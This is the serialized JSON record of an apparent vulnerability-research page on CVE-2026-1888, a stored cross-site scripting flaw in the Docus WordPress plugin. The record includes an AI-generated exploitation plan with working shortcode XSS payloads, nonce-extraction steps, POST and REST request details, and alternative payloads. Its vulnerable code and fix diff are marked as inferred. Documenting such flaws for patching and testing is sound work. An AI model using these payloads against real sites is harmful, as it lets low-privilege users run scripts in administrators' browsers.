[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEoR99IrcjuuBptkvyoyRAZi4wvLCD-Wmgz8vLLEyrk4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1888","docus-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Docus \u003C= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Docus – YouTube Video Playlist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'docusplaylist' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","docus",null,"\u003C=1.0.6","1.0.7","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-05 18:37:47","2026-02-06 06:46:28",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F16c6fec8-81ec-477a-9942-10fd3adb8fa4?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1888 (Docus \u003C= 1.0.6)\n\n## 1. Vulnerability Summary\nThe **Docus – YouTube Video Playlist** plugin (v1.0.6 and below) contains a stored cross-site scripting (XSS) vulnerability. The plugin registers a shortcode, `[docusplaylist]`, which accepts various attributes to configure the playlist display. The handler for this shortcode fails to properly sanitize or escape these attribute values before rendering them into the HTML output. \n\nAs WordPress allows users with the **Contributor** role or higher to create posts and use shortcodes, an attacker can inject arbitrary JavaScript into a post. When an administrator or any other user views the post, the script executes in their browser context.\n\n## 2. Attack Vector Analysis\n- **Shortcode:** `[docusplaylist]`\n- **Vulnerable Attributes (Inferred):** Attributes like `id`, `playlist_id`, `style`, `class`, or `layout` are typical candidates. Based on the vulnerability description, any attribute processed by the shortcode callback and echoed into the page is likely a vector.\n- **Endpoint:** `wp-admin\u002Fpost.php` (via `POST` request) or `wp-json\u002Fwp\u002Fv2\u002Fposts`.\n- **Authentication Level:** Contributor (can create posts but cannot publish) or higher.\n- **Preconditions:** The plugin must be active. A post containing the malicious shortcode must be saved and then viewed by a victim.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin uses `add_shortcode( 'docusplaylist', 'render_docus_playlist' )` (function name inferred).\n2.  **Processing:** When a post is viewed, WordPress parses `[docusplaylist attr=\"payload\"]`.\n3.  **Sink:** The callback function receives an `$atts` array:\n    ```php\n    function render_docus_playlist( $atts ) {\n        $atts = shortcode_atts( array(\n            'id' => '',\n            'style' => 'default'\n        ), $atts );\n        \n        \u002F\u002F VULNERABLE CODE:\n        return '\u003Cdiv class=\"docus-playlist\" data-style=\"' . $atts['style'] . '\">...\u003C\u002Fdiv>'; \n        \u002F\u002F Lack of esc_attr() allows breaking out of the attribute and injecting tags.\n    }\n    ```\n4.  **Output:** The unescaped payload is sent to the browser.\n\n## 4. Nonce Acquisition Strategy\nWhile the exploitation of the XSS itself occurs on the frontend and doesn't require a nonce, **saving the post** as a Contributor requires a WordPress core nonce (`_wpnonce`).\n\n1.  **Login:** Log in as a Contributor using the `http_request` tool.\n2.  **Access Editor:** Navigate to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` from the form or the `wp.apiFetch` settings if using the Block Editor.\n    - *Selector:* `document.querySelector('#_wpnonce').value` (Classic Editor) or via the REST API headers.\n\n## 5. Exploitation Strategy\n### Step 1: Create Malicious Post (Contributor)\nSubmit a request to save a new post containing the XSS payload within the shortcode.\n\n- **Request Type:** `POST`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Payload Parameters:**\n    - `post_title`: `XSS Test`\n    - `content`: `[docusplaylist style='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    - `action`: `editpost`\n    - `post_ID`: (Obtained from post-new.php)\n    - `_wpnonce`: (Obtained from post-new.php)\n    - `post_status`: `pending` (Contributors can only submit for review)\n\n### Step 2: Trigger XSS (Administrator)\nAs an Administrator, view the \"Pending\" post to \"review\" it.\n\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]&preview=true`\n- **Action:** Navigate to the URL using `browser_navigate`.\n\n## 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `docus` version 1.0.6 is installed and activated.\n2.  **User Creation:** Create a user with the `contributor` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n3.  **Identify Post ID:** Initiate a post creation to get a valid `post_ID`.\n    ```bash\n    wp post create --post_type=post --post_status=draft --post_author=$(wp user get attacker --field=ID)\n    ```\n\n## 7. Expected Results\n- When the Administrator views the post (either in preview mode or after publishing), the browser should render the HTML as:\n  `\u003Cdiv class=\"docus-playlist\" data-style=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...\u003C\u002Fdiv>`\n- A JavaScript alert box showing the domain will trigger.\n\n## 8. Verification Steps\n1.  **Source Code Inspection:** After the HTTP request, use `http_request` to GET the post content and check for the unescaped script tag.\n    ```bash\n    # Verification via CLI to see the raw content stored\n    wp post get [POST_ID] --field=post_content\n    ```\n2.  **Check for Rendered Output:** Confirm the attribute breakout in the frontend HTML.\n    ```bash\n    # Search for the breakout pattern in the rendered HTML\n    curl -s \"http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]\" | grep \"data-style=\\\"\\\">\u003Cscript>\"\n    ```\n\n## 9. Alternative Approaches\nIf the `style` attribute is not vulnerable, try other common attributes identified in the source (once available) or common defaults:\n- `[docusplaylist id='\">\u003Cimg src=x onerror=alert(1)>']`\n- `[docusplaylist playlist_id='javascript:alert(1)']` (if used in a link `href`)\n- `[docusplaylist class='\">\u003Ciframe src=\"javascript:alert(1)\">\u003C\u002Fiframe>']`\n\nIf the Block Editor (Gutenberg) is enforced, use the REST API to update the post:\n- **Endpoint:** `POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts\u002F[ID]`\n- **Header:** `X-WP-Nonce: [NONCE]`\n- **Body:** `{\"content\": \"[docusplaylist style='\\\">\u003Cscript>alert(1)\u003C\u002Fscript>']\"}`","The Docus – YouTube Video Playlist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'docusplaylist' shortcode in versions up to 1.0.6. This occurs due to the plugin failing to sanitize or escape shortcode attributes (like 'style', 'id', or 'class') before rendering them into the HTML, allowing Contributor-level users to inject arbitrary JavaScript.","\u002F\u002F Inferred from research plan code flow\nfunction render_docus_playlist( $atts ) {\n    $atts = shortcode_atts( array(\n        'id' => '',\n        'style' => 'default'\n    ), $atts );\n    \n    \u002F\u002F VULNERABLE CODE: Lack of esc_attr() allows breaking out of the attribute and injecting tags.\n    return '\u003Cdiv class=\"docus-playlist\" data-style=\"' . $atts['style'] . '\">...\u003C\u002Fdiv>'; \n}","--- docus\u002Fdocus.php\n+++ docus\u002Fdocus.php\n@@ -4,5 +4,5 @@\n-    $atts = shortcode_atts( array(\n-        'id' => '',\n-        'style' => 'default'\n-    ), $atts );\n-    \n-    return '\u003Cdiv class=\"docus-playlist\" data-style=\"' . $atts['style'] . '\">...\u003C\u002Fdiv>'; \n+    $atts = shortcode_atts( array(\n+        'id' => '',\n+        'style' => 'default'\n+    ), $atts );\n+    \n+    return '\u003Cdiv class=\"docus-playlist\" data-style=\"' . esc_attr( $atts['style'] ) . '\">...\u003C\u002Fdiv>';","The exploit involves an authenticated Contributor (or higher) injecting a script through the [docusplaylist] shortcode. \n\n1. Log in as a Contributor user.\n2. Create a new post or edit an existing draft.\n3. Insert the shortcode with a payload that breaks the HTML attribute context: [docusplaylist style='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>'].\n4. Save the post (this triggers the storage of the script).\n5. An administrator or site visitor views the post (or post preview), causing the browser to render the unescaped attribute and execute the malicious script.","gemini-3-flash-preview","2026-04-21 03:50:01","2026-04-21 03:51:47",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.0.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdocus\u002Ftags\u002F1.0.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdocus.1.0.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdocus\u002Ftags\u002F1.0.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdocus.1.0.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdocus\u002Ftags"]